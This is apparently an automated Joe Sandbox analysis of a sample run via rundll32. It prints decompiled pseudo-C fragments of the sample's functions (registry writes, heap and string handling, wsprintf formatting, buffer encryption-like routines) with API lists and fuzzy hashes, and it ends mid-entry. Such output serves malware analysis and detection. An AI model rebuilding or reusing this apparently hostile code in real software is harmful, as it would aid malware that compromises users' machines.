                                0x03437674
                                0x03437679
                                0x0343767e
                                0x00000000
                                0x00000000
                                0x0343766e
                                0x0343766e
                                0x03437680
                                0x03437684
                                0x03437696
                                0x03437696
                                0x034376a1
                                0x034376a6
                                0x034376a9
                                0x034376ae
                                0x034376b2
                                0x034376b8

                                APIs
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 03437664
                                • Sleep.KERNEL32(0000000A), ref: 0343766E
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03437696
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034376B2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 47b16599131d4346353d7bf98023b1c8c7ec8147b3bc6a4680a091feb0140556
                                • Instruction ID: 043ce0e274e53489f1f2ea55613b4af37681e8530d986ecf2449dd0b5bcacbd1
                                • Opcode Fuzzy Hash: 47b16599131d4346353d7bf98023b1c8c7ec8147b3bc6a4680a091feb0140556
                                • Instruction Fuzzy Hash: 72F0FEB02842419BE710FF69DD48F567FF4AB16740B044405F9D5EF2A5C770E850CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0348A477
                                • memcpy.NTDLL ref: 0348A49F
                                  • Part of subcall function 03487950: NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                  • Part of subcall function 03487950: RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                  • Part of subcall function 03487950: SetLastError.KERNEL32(00000000), ref: 0348798F
                                • GetLastError.KERNEL32(00000010,00000218,0349386D,00000100,?,00000318,00000008), ref: 0348A4B6
                                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0349386D,00000100), ref: 0348A599
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                • String ID:
                                • API String ID: 685050087-0
                                • Opcode ID: 56312a6f808637d2bcdd5fbecfc261597ef59eb1f054559f135c8301564f2b47
                                • Instruction ID: 743d7b7c7f747ec56d51f679c34e680a16da23cdf31dac63dbd0b88a784d2307
                                • Opcode Fuzzy Hash: 56312a6f808637d2bcdd5fbecfc261597ef59eb1f054559f135c8301564f2b47
                                • Instruction Fuzzy Hash: A341A0B5504701AFD761EF25D841BABBBF8BB48310F00892FF598CA250E770D5558BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0343216C(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				void* _t37;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E03433695(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x343a348; // 0x21ad5a8
                                				_t4 = _t24 + 0x343be58; // 0x55e9400
                                				_t5 = _t24 + 0x343be00; // 0x4f0053
                                				_t26 = E0343155C( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x343a348; // 0x21ad5a8
                                						_t11 = _t32 + 0x343be4c; // 0x55e93f4
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x343be00; // 0x4f0053
                                						_t52 = E034328C4(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x343a348; // 0x21ad5a8
                                							_t13 = _t35 + 0x343ba51; // 0x30314549
                                							_t37 = E034341FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                							if(_t37 == 0) {
                                								_t61 =  *0x343a2fc - 6;
                                								if( *0x343a2fc <= 6) {
                                									_t42 =  *0x343a348; // 0x21ad5a8
                                									_t15 = _t42 + 0x343bde2; // 0x52384549
                                									E034341FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x343a348; // 0x21ad5a8
                                							_t17 = _t38 + 0x343be90; // 0x55e9438
                                							_t18 = _t38 + 0x343be68; // 0x680043
                                							_t45 = E034374B6(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x343a2d8, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x343a2d8, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E03433AC2(_t54);
                                				}
                                				return _t45;
                                			}

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,055E9400,00000000,?,76CDF710,00000000,76CDF730), ref: 034321BB
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055E9438,?,00000000,30314549,00000014,004F0053,055E93F4), ref: 03432258
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,034366BE), ref: 0343226A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 0b41953ac505877d7445532ad434a47a0065ca6bf7110315988c65cd8a4beacd
                                • Instruction ID: 65171fb13a2789fb5ff4cd6878a4f4252b1947163d869d12fbe420fa275aada1
                                • Opcode Fuzzy Hash: 0b41953ac505877d7445532ad434a47a0065ca6bf7110315988c65cd8a4beacd
                                • Instruction Fuzzy Hash: 0831DF3690020CBFDB11EBD9DC85F9A7BFCEB49B00F14015AAA04AF261D3B19A19CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E034343EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                				void* _v8;
                                				char _v48;
                                				void* __edi;
                                				intOrPtr _t22;
                                				intOrPtr _t30;
                                				intOrPtr _t34;
                                				intOrPtr* _t42;
                                				void* _t43;
                                				void* _t46;
                                				intOrPtr* _t48;
                                				void* _t49;
                                				intOrPtr _t51;
                                
                                				_t42 = _a16;
                                				_t48 = __eax;
                                				_t22 =  *0x343a348; // 0x21ad5a8
                                				_t2 = _t22 + 0x343b67a; // 0x657a6973
                                				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                                				if( *0x343a2ec >= 5) {
                                					_t30 = E034356C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                                					L5:
                                					_a4 = _t30;
                                					L6:
                                					if(_a4 != 0) {
                                						L9:
                                						 *0x343a2ec =  *0x343a2ec + 1;
                                						L10:
                                						return _a4;
                                					}
                                					_t50 = _a16;
                                					 *_t48 = _a16;
                                					_t49 = _v8;
                                					 *_t42 = E0343708D(_t50, _t49); // executed
                                					_t34 = E03432B23(_t49, _t50); // executed
                                					if(_t34 != 0) {
                                						 *_a8 = _t49;
                                						 *_a12 = _t34;
                                						if( *0x343a2ec < 5) {
                                							 *0x343a2ec =  *0x343a2ec & 0x00000000;
                                						}
                                						goto L10;
                                					}
                                					_a4 = 0xbf;
                                					E0343561E();
                                					HeapFree( *0x343a2d8, 0, _t49);
                                					goto L9;
                                				}
                                				_t51 =  *0x343a3e0; // 0x55e9b78
                                				if(RtlAllocateHeap( *0x343a2d8, 0, 0x800) == 0) {
                                					_a4 = 8;
                                					goto L6;
                                				}
                                				_t30 = E0343300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                                				goto L5;
                                			}

                                APIs
                                • wsprintfA.USER32 ref: 0343440D
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03434432
                                  • Part of subcall function 0343300E: GetTickCount.KERNEL32 ref: 03433025
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433072
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 0343308F
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 034330B1
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 034330D8
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433103
                                  • Part of subcall function 0343300E: HeapFree.KERNEL32(00000000,?), ref: 03433116
                                  • Part of subcall function 0343300E: wsprintfA.USER32 ref: 03433135
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 034344AC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: wsprintf$Heap$Free$AllocateCountTick
                                • String ID:
                                • API String ID: 1307794992-0
                                • Opcode ID: 2ec694fae8c4f3bbe1e14267bf84b116140ee7a4670557a76532229ad4e45e74
                                • Instruction ID: 14050e7be6efed57449da57cd79a74450dce0605c65e1d548be71c2b91594f1f
                                • Opcode Fuzzy Hash: 2ec694fae8c4f3bbe1e14267bf84b116140ee7a4670557a76532229ad4e45e74
                                • Instruction Fuzzy Hash: FE314976540208EFCB01EFA6D884EDA3BFCFB0A304F108066E955AF350D7709955CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,03499068,0347E6ED,00000001,00000000,0616C314,0349906E,00000000,00000000,0348CB01,0616C314,75BCC740,00000000), ref: 03486C72
                                • RegSetValueExA.KERNEL32(03499068,00000003,00000000,00000003,03499068,00000028), ref: 03486CB3
                                • RegCloseKey.ADVAPI32(?), ref: 03486CBF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$CloseCreateQuerylstrlen
                                • String ID:
                                • API String ID: 2552977122-0
                                • Opcode ID: de4bc3d4ad4658ed069ba8510ddb528ee9226670cedd8cb903deac5d35ad0457
                                • Instruction ID: 38b9b24ec2dc23b010c87cf5321100046efe6e19bba95ffd72723e09a159d8ec
                                • Opcode Fuzzy Hash: de4bc3d4ad4658ed069ba8510ddb528ee9226670cedd8cb903deac5d35ad0457
                                • Instruction Fuzzy Hash: 84316775D00218EFEF61EF98E8449AEBBF8EB18714F06416FEA14FA244C3354A44CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0349087A: lstrlen.KERNEL32(?,00000000,0348BA3E,00000027,0349A1E8,?,00000000,?,?,0348BA3E,?,00000001,?,03480971,00000000,?), ref: 034908B0
                                  • Part of subcall function 0349087A: lstrcpy.KERNEL32(00000000,00000000), ref: 034908D4
                                  • Part of subcall function 0349087A: lstrcat.KERNEL32(00000000,00000000), ref: 034908DC
                                • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 034762A8
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 034762BE
                                • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 03476307
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open$Closelstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 4131162436-0
                                • Opcode ID: f6161c8c33d037cfe292272c2e226dec5e5a77d7d8906df1feb8f813d071e5ef
                                • Instruction ID: 8740a218a3ead5ac891e10fda4e60b797a8f6d1c43b80a2515e791c8b9277e15
                                • Opcode Fuzzy Hash: f6161c8c33d037cfe292272c2e226dec5e5a77d7d8906df1feb8f813d071e5ef
                                • Instruction Fuzzy Hash: 5C218E75900208BFDB01EFD5DC81CEEBBBDEB04204B0540BBE500AB211E7349E58CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E03433B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                				char _v5;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				char _t28;
                                				void* _t33;
                                				void* _t38;
                                				void* _t45;
                                				char* _t46;
                                				void* _t48;
                                				char* _t56;
                                				char* _t57;
                                				intOrPtr _t59;
                                				void* _t60;
                                
                                				_t56 = _a4;
                                				_t60 = __eax;
                                				_v12 = 0xb;
                                				if(_t56 != 0 && __eax != 0) {
                                					_t5 = _t60 - 1; // -1
                                					_t46 =  &(_t56[_t5]);
                                					_t28 =  *_t46;
                                					_v5 = _t28;
                                					 *_t46 = 0;
                                					__imp__(_a8, _t45);
                                					_v16 = _t28;
                                					_t57 = StrStrA(_t56, _a8);
                                					if(_t57 != 0) {
                                						 *_t46 = _v5;
                                						_t33 = RtlAllocateHeap( *0x343a2d8, 0, _a16 + _t60); // executed
                                						_t48 = _t33;
                                						if(_t48 == 0) {
                                							_v12 = 8;
                                						} else {
                                							_t58 = _t57 - _a4;
                                							E03437A1E(_t57 - _a4, _a4, _t48);
                                							_t38 = E03437A1E(_a16, _a12, _t58 + _t48);
                                							_t53 = _v16;
                                							_t59 = _a16;
                                							E03437A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                							 *_a20 = _t48;
                                							_v12 = _v12 & 0x00000000;
                                							 *_a24 = _t60 - _v16 + _t59;
                                						}
                                					}
                                				}
                                				return _v12;
                                			}


                                APIs
                                • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 03433B8C
                                • StrStrA.SHLWAPI(00000000,?), ref: 03433B99
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03433BB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 556738718-0
                                • Opcode ID: 846b026cf8200bc0ffb4ac8ae5fd71a487c871c7becd1583efc760d05709bbc2
                                • Instruction ID: 330da2c3c63a5cde570806a1d7adc7a52538714a7743377a5d1825fd10ba2b70
                                • Opcode Fuzzy Hash: 846b026cf8200bc0ffb4ac8ae5fd71a487c871c7becd1583efc760d05709bbc2
                                • Instruction Fuzzy Hash: EE21903A604249AFCF11DF68C884B9EBFB5EF8A214F088155EC54AF309C735D955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E03436E6D(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1;
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA();
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E03436D63(_t20 << 2);
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0x3439284); // executed
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0;
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9);
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16;
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17;
                                				}
                                				return 0;
                                			}

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,055E95AC,?,?,034376A6,?,055E95AC), ref: 03436E89
                                • StrTrimA.SHLWAPI(?,03439284,00000002,?,034376A6,?,055E95AC), ref: 03436EA7
                                • StrChrA.SHLWAPI(?,00000020,?,034376A6,?,055E95AC), ref: 03436EB2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 592119b8ce5cdb3d1be46fff9450ee7421247fd173f6129dab2345b9e475074d
                                • Instruction ID: 0d7384d030434513a5871a2506e54572d950b859a342aed6e748a859a5350422
                                • Opcode Fuzzy Hash: 592119b8ce5cdb3d1be46fff9450ee7421247fd173f6129dab2345b9e475074d
                                • Instruction Fuzzy Hash: 3601B5713053577EE720DA2ACC86F677B9DEBCE650F0A0013E955CF282D674C806C664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E03437928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t14;
                                				intOrPtr _t18;
                                				intOrPtr _t19;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				long _t28;
                                
                                				_t27 = __edi;
                                				_t26 = _a8;
                                				_t14 = E03433F07(_a4, _t26, __edi); // executed
                                				_t28 = _t14;
                                				if(_t28 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t18 =  *0x343a348; // 0x21ad5a8
                                					_t28 = 0;
                                					_v64 = 0x3c;
                                					if(_a12 == 0) {
                                						_t7 = _t18 + 0x343b4e0; // 0x70006f
                                						_t19 = _t7;
                                					} else {
                                						_t6 = _t18 + 0x343b8f4; // 0x750072
                                						_t19 = _t6;
                                					}
                                					_v52 = _t19;
                                					_push(_t28);
                                					_v48 = _a4;
                                					_v44 = _t26;
                                					_v36 = _t27;
                                					E034323AA();
                                					_push( &_v64);
                                					if( *0x343a100() == 0) {
                                						_t28 = GetLastError();
                                					}
                                					_push(1);
                                					E034323AA();
                                				}
                                				return _t28;
                                			}

                                APIs
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(00000000), ref: 03433F61
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(0070006F), ref: 03433F75
                                  • Part of subcall function 03433F07: SysAllocString.OLEAUT32(00000000), ref: 03433F87
                                • memset.NTDLL ref: 0343794B
                                • GetLastError.KERNEL32 ref: 03437997
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocString$ErrorLastmemset
                                • String ID: <
                                • API String ID: 3736384471-4251816714
                                • Opcode ID: 3d2a804e7334c906c98a7b2c0887742e100d8795595b267312b0cf35c30b3645
                                • Instruction ID: 04dee793b2c6a8af6148dc73c5b35317f1559655affbfbd956286e05a91bdbc4
                                • Opcode Fuzzy Hash: 3d2a804e7334c906c98a7b2c0887742e100d8795595b267312b0cf35c30b3645
                                • Instruction Fuzzy Hash: 5E012D75900218AFDB10EFA9D885FDEBBF8EF09750F444126F954EF200D77095048B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                • RegOpenKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7C3
                                • lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateOpenlstrlen
                                • String ID:
                                • API String ID: 2865187142-0
                                • Opcode ID: 15a8aefdaea5dd636f2c24f9b17a376f5797d6923db292fc8d6aeefe8cb1738c
                                • Instruction ID: 717a9022fef08a53b84d1a832f5942a6b30c4fe590c0c440021c801f0ed405a8
                                • Opcode Fuzzy Hash: 15a8aefdaea5dd636f2c24f9b17a376f5797d6923db292fc8d6aeefe8cb1738c
                                • Instruction Fuzzy Hash: 59F04976100208BFE711AF91DC88EAF7BACEB56694F14810AFD069D340D6719684C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(000005BC,0348C3DB), ref: 0348E83B
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 03473528
                                  • Part of subcall function 034734FF: RtlDeleteCriticalSection.NTDLL(0349A3E0), ref: 0347355B
                                  • Part of subcall function 034734FF: RtlDeleteCriticalSection.NTDLL(0349A400), ref: 03473562
                                  • Part of subcall function 034734FF: ReleaseMutex.KERNEL32(000005CC,00000000,?,?,?,0348E846), ref: 0347358B
                                  • Part of subcall function 034734FF: FindCloseChangeNotification.KERNEL32(?,?,0348E846), ref: 03473597
                                  • Part of subcall function 034734FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0348E846), ref: 034735A3
                                  • Part of subcall function 034734FF: CloseHandle.KERNEL32(?,?,0348E846), ref: 034735AF
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 034735B5
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 034735C9
                                  • Part of subcall function 034734FF: HeapFree.KERNEL32(00000000,00000000,?,?,0348E846), ref: 034735ED
                                  • Part of subcall function 034734FF: RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 03473623
                                  • Part of subcall function 034734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 0347363F
                                • CloseHandle.KERNEL32(000005BC), ref: 0348E850
                                • HeapDestroy.KERNELBASE(05D70000), ref: 0348E860
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                • String ID:
                                • API String ID: 3503058985-0
                                • Opcode ID: a4179b18af5b2c201269cc85b6644a17d5953791544ab8c138539ebdba54c45a
                                • Instruction ID: c3befed2186f3ec76186d6a30475861715d75a62d9fc6d5544b768576931b1ae
                                • Opcode Fuzzy Hash: a4179b18af5b2c201269cc85b6644a17d5953791544ab8c138539ebdba54c45a
                                • Instruction Fuzzy Hash: 51E012707002419FDB21FF36D84DE0F33D86B1164174D086BB405FF208DB20D480E694
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03432575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                				int _v12;
                                				signed int _v16;
                                				void* _v20;
                                				signed char _v36;
                                				void* _t24;
                                				intOrPtr _t27;
                                				void* _t35;
                                				signed int _t38;
                                				signed char* _t46;
                                				int _t53;
                                				void* _t55;
                                				void* _t56;
                                				void* _t57;
                                
                                				_v16 = _v16 & 0x00000000;
                                				_t46 = _a4;
                                				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                				_v12 = 0x110;
                                				_t24 = E03436D63(_t53);
                                				_a4 = _t24;
                                				if(_t24 != 0) {
                                					memcpy(_t24,  *0x343a378, 0x110);
                                					_t27 =  *0x343a37c; // 0x0
                                					_t57 = _t56 + 0xc;
                                					if(_t27 != 0) {
                                						_t51 = _a4;
                                						E0343138A(0x110, _a4, _a4, _t27, 0);
                                					}
                                					if(E03436BF2( &_v36) != 0) {
                                						_t35 = E03435FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                						if(_t35 == 0) {
                                							_t55 = _v20;
                                							_v36 =  *_t46;
                                							_t38 = E034313C7(_t55, _a8, _t51, _t46, _a12); // executed
                                							_v16 = _t38;
                                							 *(_t55 + 4) = _v36;
                                							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                                							_t57 = _t57 + 0xc;
                                							E03436C2C(_t55);
                                						}
                                					}
                                					memset(_a4, 0, _t53);
                                					E03436C2C(_a4);
                                				}
                                				return _v16;
                                			}

                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,03434493,?), ref: 034325AB
                                • memset.NTDLL ref: 03432621
                                • memset.NTDLL ref: 03432635
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 1529149438-0
                                • Opcode ID: 31ef8deee4daa51fd6874bc32764ad62e4a900608a4c6daa07723f20ec92933e
                                • Instruction ID: 3105622c2b276cb791d17fe77e8e243cdc12df78aec678e6285081965bd45825
